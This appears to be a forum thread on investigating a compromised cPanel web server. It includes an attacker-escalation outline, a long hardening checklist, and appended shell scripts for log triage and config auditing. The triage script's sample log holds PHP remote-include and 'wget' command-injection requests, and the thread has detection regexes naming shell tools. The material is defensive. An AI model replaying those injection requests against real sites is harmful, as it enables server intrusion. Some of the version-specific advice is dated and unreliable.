Hi. One of our servers seems compromised - we need to know how they got in and the damage done. What do you think should be our next steps? If there is a security expert who can harden our server, please PM too, so that we can pay for your services while learning how to prevent this from happening on other servers. Thanks.
This should help you a bit:

    find /usr/local/apache/domlogs -type f -exec egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20' {} \;

In php.ini:

    disable_functions = "exec,system,passthru,readfile,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,dl,popen,parse_ini_file,show_source,curl_exec"

1) The attacker finds a hole in one of your users' local PHP scripts.
2) They inject their own PHP code from a remote file, making it run as if they had uploaded the page by regular FTP.
3) There are numerous ways you can easily collect the usernames of accounts, very very very easy.
4) You can then start to brute-force guess passwords of user accounts.
5) You can then start scouring the server for local exploits and use them to your advantage. E.g. the script you mentioned in that include checks to see if wget, gcc and other system binaries are on the system and accessible for the attacker to use.
6) With a list of what's installed and what they can use, they can now download hacks and start trying to crack your machine and compiling code attempting to gain root, etc.
7) They can search any and all 777-permission files/directories and inject whatever they feel like.

Good times for them, crappy time for the site owners and server owners to clean up the mess.

Preventing this is a combination of things that I won't go into complete details about, but I'll brief over so you get the idea.
1) Lock your system binaries, like wget, gcc and others, to stop anyone from using them.
2) Secure PHP by disabling functions used such as proc_open, exec, system, passthru and so on.
3) Make sure PHP/Apache is up to date.
4) Install mod_security and have a CURRENT ruleset! mod_security through the cPanel install has NO ruleset! I have rulesets I give all my clients which are tried, tested and true.
5) Have a current kernel installed; there are many exploits that still work on a lot of providers.

Reference: http://forums.cpanel.net/showthread.php?t=62821&highlight=all+index+page+got+hacked

More is below..
===========================================================================
Secure your Linux server:
===========================================================================
1. Kernel recompile with grsecurity
2. Firewall = CSF
3. Stop unnecessary processes
4. Logcheck
5. Logwatch
   Optimizing host.conf and sysctl.conf: http://www.eth0.us/node/104
   To modify Logwatch, SSH into the server and log in as root. At the command prompt type:
       pico -w /etc/log.d/conf/logwatch.conf
   Scroll down to "MailTo = root" and change it to "MailTo =" followed by your e-mail address. Note: set the e-mail address to an offsite account in case you get hacked.
   Now scroll down to "Detail = Low" and change that to Medium or High (Detail = 5 or Detail = 10). Note: High will give you more detailed logs with all actions. Save and exit.
6. WHM configuration check
7. OpenSSH configuration check
8. Switch from proftpd to pure-ftpd
9. Rootkit Hunter (rkhunter):
   1. Log in to your server via SSH as root. Then type:
          cd /usr/local/src/
   2. Download rkhunter version 1.1.4. Type:
          wget http://downloads.rootkit.nl/rkhunter-1.1.4.tar.gz
   3. Extract the files. Type:
          tar -xzvf rkhunter-1.1.4.tar.gz
   4. Type:
          cd rkhunter
   5. Type:
          ./installer.sh
   6. Let's set up rkhunter to e-mail you daily scan reports. Type:
          pico -w /etc/cron.daily/rkhunter.sh
      Add the following:
          #!/bin/bash
          (/usr/local/bin/rkhunter -c --cronjob 2>&1 | mail -s "RKhunter Scan Details" you@example.com)
      Replace the e-mail above with your e-mail!! It is best to send the e-mail to an e-mail off-site, so that if the box IS compromised the hacker can't erase the scan report unless he hacks another server too. Type:
          chmod +x /etc/cron.daily/rkhunter.sh
10. Chkrootkit. Installing chkrootkit:
        [root@server ~]# wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
        [root@server ~]# tar xvfz chkrootkit.tar.gz
        [root@server ~]# ./chkrootkit*/chkrootkit
11. mod_security
12. mod_evasive
13. Host spoof protection
14. Operating system check
15. Name server configuration check
16. Disk check
17. Kernel check
18. Apache tune and check
19. MySQL tune and check
20. Enhanced log rotation
21. Day-of-the-week backup rotations
22. Secure /tmp, /var/tmp and /dev/shm
23. Libsafe for 2.4 kernels
24. Exploit check
25. Delete unnecessary OS users
26. Disable open DNS recursion
27. Enhanced path protection
28. Remove SUID/GUID from binaries
29. PHP hardening
30. phpsuexec
31. Disable vulnerable phpBB installs
32. Initial cPanel configuration
33. Check iptables is configured
34. Check incoming MySQL port
35. Check /etc/cron.daily/logrotate
36. Check /etc/resolv.conf for localhost entry
37. Check /etc/named.conf for recursion restrictions
38. Check server runlevel
39. Check nobody cron
40. Check operating system support
41. Check SSHv1 is disabled
42. Check SSH is on a non-standard port
43. Check SSH PasswordAuthentication
44. Check telnet port 23 is not in use
45. Check shell limits
46. Check Background Process Killer
47. Check root forwarder
48. Check exim for extended logging
49. Check php for enable_dl:
        enable_dl = Off
50. Check php for disable_functions:
        disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open, allow_url_fopen
51. Check php for register_globals:
        register_globals = Off
52. Check php open_basedir protection
53. Check phpsuexec
54. Check cPanel login is SSL only
55. Check BoxTrapper is disabled
56. Check max emails per hour is set
57. Check whether users can reset passwords via email
58. Check whether native cPanel SSL is enabled
59. Check compilers
60. Check anonymous FTP access
61. Check allow remote domains
62. Check block common domains
63. Check allow park domains
64. Check package updates
65. Check security updates
66. Check melange chat server
67. service cups stop; chkconfig cups off
68. service xfs stop; chkconfig xfs off
69. service atd stop; chkconfig atd off
70. service nfslock stop; chkconfig nfslock off
71. service canna stop; chkconfig canna off
72. service FreeWnn stop; chkconfig FreeWnn off
73. service cups-config-daemon stop; chkconfig cups-config-daemon off
74. service iiim stop; chkconfig iiim off
75. service mDNSResponder stop; chkconfig mDNSResponder off
76. service nifd stop; chkconfig nifd off
77. service rpcidmapd stop; chkconfig rpcidmapd off
78. service bluetooth stop; chkconfig bluetooth off
79. service anacron stop; chkconfig anacron off
80. service gpm stop; chkconfig gpm off
81. service saslauthd stop; chkconfig saslauthd off
82. service avahi-daemon stop; chkconfig avahi-daemon off
83. service avahi-dnsconfd stop; chkconfig avahi-dnsconfd off
84. service hidd stop; chkconfig hidd off
85. service pcscd stop; chkconfig pcscd off
86. service sbadm stop; chkconfig sbadm off
87. service webmin stop; chkconfig webmin off
88. Add a load alert script with a 1 min cron:
        #!/bin/bash
        # uptime alert script
        UP=`uptime | awk '{print $(NF-2)}' | cut -d. -f1`
        if test $UP -gt 4
        then
            uptime | mail -s "**SERVER LOAD is $UP" you@example.com
        fi
    Replace the e-mail above with your e-mail.
89. Ignore ping:
        # iptables -A INPUT -p icmp -j DROP
        echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
        vi /etc/sysctl.conf
    Append the following line:
        net.ipv4.icmp_echo_ignore_all = 1
90. Find directories with 777 permissions:
        find . -type d -perm 777
91. Check for open ports using the nmap command.
92. Disable identification output for Apache. To disable the version output for proftp, SSH into the server and log in as root. At the command prompt type:
        pico /etc/httpd/conf/httpd.conf
    Scroll (way) down and change the following line to:
        ServerSignature Off
    Restart Apache. At the command prompt type:
        /etc/rc.d/init.d/httpd restart
93. Change ssh ListenAddress in /etc/ssh/sshd_config
94. PermitRootLogin no
95. Add a root login alert:
        vi .bash_profile
    Add:
        echo 'ALERT - Root Shell Access on:' `date` `who` | mail -s "Alert: Root Access from `who | awk '{print $6}'`" you@example.com
    Replace the e-mail above with your e-mail.
96. Set an SSH legal message in /etc/motd
97. locate:
        locate shell.php
        locate irc
        locate eggdrop
        locate bnc
        locate BNC
        locate ptlink
        locate BitchX
        locate guardservices
        locate psyBNC
        locate .rhosts
98. Perform some UDP and TCP scans here: http://www.hackerwatch.org/probe/ This site is not bad too: https://grc.com/x/ne.dll?bh0bkyd2
99. Check /var/log/secure, /var/log/messages and the other log files of the services running to see if there are any issues.
100. Check your box to see if your performance has degraded or if your machine is being overused. For that, use these commands:
     vmstat - Displays information about memory, CPU and disk. Ex: vmstat 1 4 (where 1 is delay and 4 is count)
     mpstat - Displays statistics about CPU utilization. This will help us to see if your CPU is overworked or not. Ex: mpstat 1 4 (where 1 is delay and 4 is count)
     iostat - Displays statistics about the disk system. Useful options: -d gives the device utilization report; -k displays statistics in kilobytes per second. Ex: iostat -dk 1 4 (where 1 is delay and 4 is count)
     sar - Displays overall system performance.
     Check to see if your server has any hidden processes running.
     ps - Displays the status of all known processes.
     lsof - Lists all open files. In Linux everything is considered a file, so you will be able to see almost all of the activity on your system with this command.
101. chmod -R 700 /etc/rc.d/init.d/*
     * Use rpm -Va to find out if an rpm is modified
     * Apply security patches to vulnerable software (i.e. patch -p1 < patchfile)
     * Remove all unneeded ttys and console logins by removing the entry from /etc/securetty
     * Check system logs (e.g. /var/log/messages, /var/log/secure, etc.)
     * Set a password on the boot loader (LILO and GRUB both support this)
     * Monitor the system (Nagios or Big Brother)
102. Install AIDE (Advanced Intrusion Detection Environment), a free replacement for Tripwire: http://www.cs.tut.fi/~rammer/aide.html
103. Testing phase: use tools like Nessus, Nikto and nmap to do a penetration test and see how well your server is secured. Also do a stress test.
104. Reference
     * What is spoofing? http://en.wikipedia.org/wiki/Spoofing_attack
     * What is ICMP? http://en.wikipedia.org/wiki/Icmp
     * For aMule: http://www.amule.org/wiki/index.php/Firewall
     * SANS Top-20 Internet Security Attack Targets: http://www.sans.org/top20/
     * http://ubuntuforums.org/showthread.php?t=159661&highlight=firewall
     * http://www.hostlibrary.com/Areyourserverssecure.html
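The domlog search in the reply above flags any request containing one of the listed binary names followed by %20, which also fires on harmless paths such as flash%20logo.gif because "sh" is matched inside "flash". As an added example, not part of the original thread, here is a small POSIX shell triage script that tightens that signature (a word boundary before the binary name, "+" accepted as an encoded space, and "=http://"-style remote-include parameters), counts the hits and lists the source addresses so you can pull everything those clients did. The regex, the function names and the constructed sample log (RFC 5737 documentation addresses, invented paths) are this example's own assumptions, not the poster's.

```shell
#!/bin/sh
# Added example (not from the original post): triage Apache domlogs for the
# command-injection and remote-include signatures the post's egrep looks for.
# The regex, helper names and the sample log below are this example's own.

# A binary name that is not the tail of a longer word (so "flash%20" is not a
# hit for "sh"), followed by an encoded space (%20) or '+'; or a query
# parameter whose value is a remote URL (the classic ?page=http://host/x.txt?).
INJECT_RE='(^|[^a-z0-9_])(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)(%20|[+])|=(https?|ftp)(://|%3a%2f%2f)'

# scan_domlog FILE: print every request line matching the signature
scan_domlog() {
    grep -Ei "$INJECT_RE" "$1"
}

# count_hits FILE: number of suspicious request lines
count_hits() {
    scan_domlog "$1" | wc -l | tr -d ' '
}

# attacker_ips FILE: unique client addresses behind the suspicious requests
attacker_ips() {
    scan_domlog "$1" | awk '{ print $1 }' | sort -u
}

# make_sample_log: write a constructed combined-format access log (RFC 5737
# documentation addresses, invented paths) and print its path
make_sample_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
203.0.113.5 - - [10/Oct/2008:13:55:36 +0000] "GET /index.php?page=http://198.51.100.7/c99.txt? HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
203.0.113.5 - - [10/Oct/2008:13:56:01 +0000] "GET /index.php?cmd=cd%20/tmp;wget%20http://198.51.100.7/x.pl HTTP/1.1" 200 210 "-" "libwww-perl/5.8"
192.0.2.44 - - [10/Oct/2008:13:57:12 +0000] "GET /images/flash%20logo.gif HTTP/1.1" 200 44120 "http://www.example.com/" "Mozilla/5.0"
192.0.2.44 - - [10/Oct/2008:13:57:40 +0000] "GET /news.php?id=42 HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2008:14:02:03 +0000] "POST /upload.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2008:14:02:30 +0000] "GET /uploads/shell.php?c=perl+x.pl HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
EOF
    echo "$f"
}

# Demo on the sample. Against a real cPanel box:
#   for f in /usr/local/apache/domlogs/*; do scan_domlog "$f"; done
SAMPLE=$(make_sample_log)
echo "suspicious requests: $(count_hits "$SAMPLE")"
echo "source addresses:"
attacker_ips "$SAMPLE"
rm -f "$SAMPLE"
```

On the sample, the remote include on line 1, the cd/wget chain on line 2 and the perl+x.pl call on line 6 are reported (three hits from two addresses), while the flash%20logo.gif request is not. Once you have the addresses, grep the same logs for every request from them: the first hit is rarely the first contact, and the earlier lines usually show which script was probed before the injection landed.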
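Items 41-43, 49-52 and 94 of the checklist above are settings to verify in /etc/ssh/sshd_config and php.ini. As an added example, not from the original post, the following POSIX shell script reads both files the way the daemons do (sshd takes the first occurrence of a directive, PHP the last, and php.ini values may be quoted) and reports which of those items fail, returning the failure count. The function names, the constructed weak and hardened sample files, and the php.ini path in the usage comment are this example's assumptions. allow_url_fopen is an ini directive rather than a function, so the script checks it as its own "= Off" setting instead of looking for it inside disable_functions.

```shell
#!/bin/sh
# Added example (not from the original post): audit sshd_config and php.ini
# against checklist items 41-43, 49-52 and 94. The helper names and the two
# constructed config pairs below are this example's own.

# sshd_value FILE Key: effective value. sshd honours the FIRST match, so a
# "PermitRootLogin no" placed after a "PermitRootLogin yes" changes nothing.
sshd_value() {
    awk -v key="$2" '$1 !~ /^#/ && tolower($1) == tolower(key) { print $2; exit }' "$1"
}

# php_value FILE key: effective value. php.ini honours the LAST match, and the
# value may be quoted.
php_value() {
    awk -F= -v key="$2" '
        /^[ \t]*;/ { next }
        { k = $1; gsub(/[ \t]/, "", k)
          if (k == key) { v = $2; sub(/^[ \t]+/, "", v); sub(/[ \t]+$/, "", v); gsub(/"/, "", v); val = v } }
        END { print val }' "$1"
}

# audit_sshd FILE: one FAIL line per problem; return value is the failure count
audit_sshd() {
    n=0
    [ "$(sshd_value "$1" Protocol)" = "2" ] || { echo "FAIL sshd: Protocol must be exactly 2 (item 41)"; n=$((n + 1)); }
    case "$(sshd_value "$1" Port)" in
        ""|22) echo "FAIL sshd: still listening on port 22 (item 42)"; n=$((n + 1)) ;;
    esac
    [ "$(sshd_value "$1" PasswordAuthentication)" = "no" ] || { echo "FAIL sshd: PasswordAuthentication must be no (item 43)"; n=$((n + 1)); }
    [ "$(sshd_value "$1" PermitRootLogin)" = "no" ] || { echo "FAIL sshd: PermitRootLogin must be no (item 94)"; n=$((n + 1)); }
    return $n
}

# audit_php FILE: same contract for php.ini (items 49-52)
audit_php() {
    n=0
    for d in enable_dl register_globals allow_url_fopen; do
        case "$(php_value "$1" "$d" | tr 'A-Z' 'a-z')" in
            off|0) ;;
            *) echo "FAIL php: $d is not Off"; n=$((n + 1)) ;;
        esac
    done
    funcs=",$(php_value "$1" disable_functions | tr -d ' '),"
    for fn in system shell_exec passthru exec popen proc_open; do
        case "$funcs" in
            *",$fn,"*) ;;
            *) echo "FAIL php: $fn missing from disable_functions (item 50)"; n=$((n + 1)) ;;
        esac
    done
    [ -n "$(php_value "$1" open_basedir)" ] || { echo "FAIL php: open_basedir is empty (item 52)"; n=$((n + 1)); }
    return $n
}

# write_samples: constructed weak and hardened pairs; prints their directory
write_samples() {
    dir=$(mktemp -d)
    cat > "$dir/weak_sshd_config" <<'EOF'
# constructed: what a default install tends to look like
Port 22
Protocol 2,1
PermitRootLogin yes
#PermitRootLogin no
PasswordAuthentication yes
EOF
    cat > "$dir/weak_php.ini" <<'EOF'
; constructed
register_globals = On
enable_dl = On
allow_url_fopen = On
disable_functions = show_source, phpinfo
open_basedir =
EOF
    cat > "$dir/good_sshd_config" <<'EOF'
Port 2222
Protocol 2
PermitRootLogin no
PasswordAuthentication no
EOF
    cat > "$dir/good_php.ini" <<'EOF'
enable_dl = Off
register_globals = Off
allow_url_fopen = Off
disable_functions = "show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open"
open_basedir = /home/:/tmp/
EOF
    echo "$dir"
}

# Demo on the constructed files. Against a real box (php.ini path assumed):
#   audit_sshd /etc/ssh/sshd_config; audit_php /usr/local/lib/php.ini
S=$(write_samples)
audit_sshd "$S/weak_sshd_config" || echo "sshd_config: $? problem(s)"
audit_php "$S/weak_php.ini" || echo "php.ini: $? problem(s)"
rm -rf "$S"
```

The weak pair yields four sshd failures and ten php failures; the hardened pair yields none. The Protocol check only means something on OpenSSH releases that still implement SSHv1; releases that dropped it treat the directive as deprecated, so skip that line there. Run the php audit against the php.ini the web server actually loads (phpinfo() shows the path) rather than the first one you find, since cPanel builds keep several.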